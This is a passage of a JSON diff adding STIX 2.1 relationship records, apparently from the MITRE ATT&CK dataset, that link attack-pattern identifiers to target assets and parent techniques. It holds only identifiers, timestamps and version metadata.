"2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a1b52199-c8c5-438a-9ded-656f1d0888c6", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5e3a5e3b-8bb1-4e9d-8104-d27965f1caf5", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5e697692-50ab-4dc0-8875-25befd5235df", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c615231b-f253-4f58-9d47-d5b4cbdb6839", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5e6cf759-1690-41b3-9e41-d8317f4ef83d", + "created": "2020-01-14T01:26:08.261Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", + "target_ref": "attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5e7f7b93-bf98-4528-b6bc-dc60e47af788", + "created": "2020-02-10T19:55:29.505Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69", + "target_ref": "attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5e907ae0-9917-4af4-85d8-97c1d4ca750c", + "created": "2024-06-21T14:12:20.255Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.255Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ea10551-1df7-492d-8e2f-9276b00fc698", + "created": "2024-06-27T09:35:04.867Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:35:04.867Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e49920b0-6c54-40c1-9571-73723653205f", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5eac9edf-ec42-4ad9-846e-e36b533fd257", + "created": "2020-02-11T18:58:11.872Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "target_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ead089c-ccc2-4587-9ba1-edbb511b6e4c", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c675646d-e204-4aa8-978d-e3d6d65885c4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ee01089-2ab6-4cf5-a39d-adf72666eceb", + "created": "2023-09-28T20:16:28.582Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:16:28.582Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5f137987-b14e-4cca-8e0a-234760b4fd83", + "created": "2024-06-27T08:58:59.266Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T08:58:59.266Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7", + "target_ref": "x-mitre-asset--7818eb69-414c-43d2-9816-77e90a710edc", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5f1bd271-3a95-47f2-bdc6-fc3436030b48", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5f1d4d33-389b-4d9d-96b3-83db0ea756c7", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5f2a8f58-9e7a-46a1-95df-c3e85e27a072", + "created": "2020-01-17T19:23:15.423Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--573ad264-1371-4ae0-8482-d2673b719dba", + "target_ref": "attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5f42b21a-b46e-4729-a518-2c0106661b72", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5f69f13e-c7e7-488f-8e5e-988ab41a2a39", + "created": "2022-07-08T21:04:03.858Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-07-08T21:04:03.858Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "target_ref": "attack-pattern--799ace7f-e227-4411-baa0-8868704f2a69", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5fa90ef5-e767-439b-9d1a-885438d57a30", + "created": "2020-12-28T21:59:02.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee", + "target_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5fa955eb-63da-4281-8904-03f6c04c9d8d", + "created": "2020-03-17T16:21:36.718Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--478aa214-2ca7-4ec0-9978-18798e514790", + "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5fbaa512-253e-4d48-b2dd-e1aa89c28e79", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5fc2b8f5-3e30-4c07-993d-c71cefc5ea4e", + "created": "2024-06-21T14:12:20.257Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.257Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3b744087-9945-4a6f-91e8-9dbceda417a4", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5fd3fbe1-4403-45b0-bf1d-a3576f570b03", + "created": "2024-06-21T14:12:20.256Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.256Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5fd6cbcf-9498-4c14-85d7-43677b84e471", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5fe30af6-e590-4285-9766-af390cdfba0f", + "created": "2020-10-02T17:00:44.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--ec4be82f-940c-4dcb-87fe-2bbdd17c692f", + "target_ref": "attack-pattern--55fc4df0-b42c-479a-b860-7a6761bcaad0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5fe3769e-b942-4824-ba1b-30b4f2a0414b", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6415f09-df0e-48de-9aba-928c902b7549", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ff208d0-05b8-48ac-956e-4f5005f202be", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ff26c96-c610-4669-b44e-d6318205be5a", + "created": "2023-09-29T16:43:28.841Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:43:28.841Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "target_ref": "x-mitre-asset--69d1b1ef-e918-4cfd-9a98-29debd04cb32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--5ff33fa3-daea-4499-926a-39f6dd8e5921", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--60031df2-9523-48c4-a9b1-96c4ba16afe1", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9e8b28c9-35fe-48ac-a14d-e6cc032dcbcd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--600f0115-94e3-49bf-afa6-0180b3367b94", + "created": "2023-09-28T20:06:15.180Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:06:15.180Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--601df824-5f56-4b71-9903-9fcc7cefd9ca", + "created": "2024-06-26T15:27:58.141Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T15:27:58.141Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--55bb4471-ff1f-43b4-88c1-c9384ec47abf", + "target_ref": "x-mitre-asset--8a455821-6e6e-49b0-9b6d-ac01011263c1", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--604827e0-ed66-4982-8965-d779c507f3c3", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--604cca5a-5ac9-4373-b622-b8fcf08311ab", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--604cff9d-f45d-4b5c-890b-2414a87d6c3c", + "created": "2024-06-21T14:12:20.271Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.271Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--604e1830-11ac-4ccf-a1d0-b22b80c1b024", + "created": "2023-09-29T18:07:18.253Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:07:18.253Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "target_ref": "x-mitre-asset--3a95f7e4-4877-4967-b2e8-e287976c3e64", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--605f3853-b007-4134-8a2d-6a81a35e7676", + "created": "2023-09-29T18:48:05.559Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:48:05.559Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6067c069-8e93-4bf0-bb49-97538d55c3de", + "created": "2024-04-09T20:58:32.884Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-04-09T20:58:32.884Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--6069d35b-87df-4069-a062-0ea2c946fd9b", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--607f7f92-b85b-4cd6-8bd6-35d4a87b5c87", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--60c5157f-977b-46ff-b2b2-80acc67c1a26", + "created": "2024-07-02T13:55:55.756Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.756Z", + "description": "", + "relationship_type": "targets", + "source_ref": 